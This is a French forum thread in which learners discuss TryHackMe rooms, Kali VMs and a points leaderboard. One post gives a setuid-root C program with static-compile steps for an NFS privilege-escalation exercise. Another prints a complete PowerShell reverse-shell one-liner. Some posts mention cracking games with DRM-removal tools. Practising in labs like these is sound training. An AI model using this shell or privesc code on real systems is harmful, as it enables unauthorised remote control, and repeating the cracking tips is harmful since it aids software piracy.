Ce sujet a été résolu
Parce qu'en fait, dans la partie NFS de cette room, tu n'as pas gcc sur la machine cible, donc t'es obligé de compiler depuis ta machine, qui dit absence de gcc dit aussi absence de certaines bibliothèques, d'où l'importance d'inclure les bibliothèques dans le binaire lors de la compilation.
il y a 3 mois
Rien de méchant du tout.
Le programme t'es donné, et c'est juste ça :
int main() {
setuid(0);
setgid(0);
system("thm");
}
Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).
include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)
#include <nom_de_bibliotheque.h>
Et il faudra le compiler avec gcc --static path.c -o path
Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.
Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
Le programme t'es donné, et c'est juste ça :
int main() {
setuid(0);
setgid(0);
system("thm");
}
Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).
include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)
#include <nom_de_bibliotheque.h>
Et il faudra le compiler avec gcc --static path.c -o path
Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.
Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
Je vois, merci des infos je prends notes. Je comprends assez bien, j'ai fais du C quand j'étais à 42. J'ai commencé le module je suis sur "What the Shell ?", room premium qui t'apprends à faire des reverse shell/bind shell puis ensuite je passe sur linux privilege escalation , je te dirais ce que ça donne une fois dessus
il y a 3 mois
1234567
3 mois
Vous êtes sur Linux pour faire ça ?
Oui, mais perso j'utilise une VM kali linux (même si je suis déjà sur linux), t'as tout de pré-installé
il y a 3 mois
1234567
3 mois
Vous êtes sur Linux pour faire ça ?
J'utilise une VM kali parce que c'est extrêmement pratique et que j'aime pas faire du pentest sur mon OS principal (je suis sous linux mais ça change rien, windows sait aussi faire tourner des VM).
Peu importe l'os que tu utilises, tant que tu peux faire tourner une VM kali (ou toute autre distribution qui intègre des outils d'audit)
Edit : @Pepe a résumé en une ligne
Mais, si t'as quesiton était : faut-il avoir des connaissances sur l'utilisation de linux ? La réponse est oui, quasiment tous les serveurs sont sous linux, et tu dois élever tes privilèges une fois que tu as accès à la machine cible, donc une bonne connaissance de bash est fortement recommandée.
Peu importe l'os que tu utilises, tant que tu peux faire tourner une VM kali (ou toute autre distribution qui intègre des outils d'audit)
Edit : @Pepe a résumé en une ligne
Mais, si t'as quesiton était : faut-il avoir des connaissances sur l'utilisation de linux ? La réponse est oui, quasiment tous les serveurs sont sous linux, et tu dois élever tes privilèges une fois que tu as accès à la machine cible, donc une bonne connaissance de bash est fortement recommandée.
il y a 3 mois
@Me0w J'ai fais paniquer mon Windows en prenant des notes ayaa, j'ai noté un reverse-shell pour powershell dans Obsidian (app pour prendre des notes), dès le moment ou j'ai collé le reverse shell, mon Windows la détecté comme un virus et à supprimé mon fichier de notes
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
il y a 3 mois
miko
3 mois
@Me0w J'ai fais paniquer mon Windows en prenant des notes ayaa, j'ai noté un reverse-shell pour powershell dans Obsidian (app pour prendre des notes), dès le moment ou j'ai collé le reverse shell, mon Windows la détecté comme un virus et à supprimé mon fichier de notes
Ahi, au moins windows defender fonctionne bien.
C'est ça que j'aime pas avec lui, parfois tu veux juste faire un truc légitime et t'es emmerdé par un faux positif..
C'est souvent le cas avec les jeux crackés, c'est pour ça que j'ai une partition windows 10 sans windows defender (et une autre avec)
(J'ai 2 windows et un linux)
C'est ça que j'aime pas avec lui, parfois tu veux juste faire un truc légitime et t'es emmerdé par un faux positif..
C'est souvent le cas avec les jeux crackés, c'est pour ça que j'ai une partition windows 10 sans windows defender (et une autre avec)
il y a 3 mois
Ahi, au moins windows defender fonctionne bien.
Effectivement au moins il fonctionne bien pour le coup,
C'est la première fois que ça m'arrive comme ça, je suis étonné qu'il l'ai détecté dans une note Obsidian...
Pour les jeux crack je récupère les CSF et applique gbe-fork et Steamless moi même, ça m'évite les emmerdes des faux positifs
C'est la première fois que ça m'arrive comme ça, je suis étonné qu'il l'ai détecté dans une note Obsidian...
Pour les jeux crack je récupère les CSF et applique gbe-fork et Steamless moi même, ça m'évite les emmerdes des faux positifs
il y a 3 mois
Le mec fait "Advert of cyber" parce que c'est la room qui rapporte le plus de point mais quelle petite merde...
Je suis repassé 2ème
Je suis repassé 2ème
il y a 3 mois
Je repasse premier, j'espère arriver à tenir l'avance pendant les 4heures restantes
il y a 3 mois
Me0w
3 mois
Je repasse premier, j'espère arriver à tenir l'avance pendant les 4heures restantes
Bon courage, moi je suis deuxième le premier est trop loin devant pour le rattraper en si peu de temps
il y a 3 mois
Bon courage, moi je suis deuxième le premier est trop loin devant pour le rattraper en si peu de temps
Perso on a 200 points d'écart avec le deuxième, mais le mec est capable de réagir au dernier moment, donc je suis vraiment à l’affût.
il y a 3 mois
J'ai encore deux heures dans ma league moi
Oui effectivement, le fuseau horaire est pas exactement le même.
Je suis repassé 2ème...
Je suis repassé 2ème...
il y a 3 mois
ÇA casse les couilles parce que j'arrive pas à faire les rooms de manière posée, je suis en stress total..
il y a 3 mois
Me0w
3 mois
ÇA casse les couilles parce que j'arrive pas à faire les rooms de manière posée, je suis en stress total..

Un visage sincère et plein d'empathie est le vrai visage de la " force"
il y a 3 mois
Me0w
3 mois
Tu ne devrais pas stresser autant juste pour la league, fais de manière posé et t'occupe pas tellement de ça de ton classement, c'est déjà très bien deuxième
il y a 3 mois
J'ai même pas encore fumé de la journée tellement que je suis absorbé dans ce jeu.
il y a 3 mois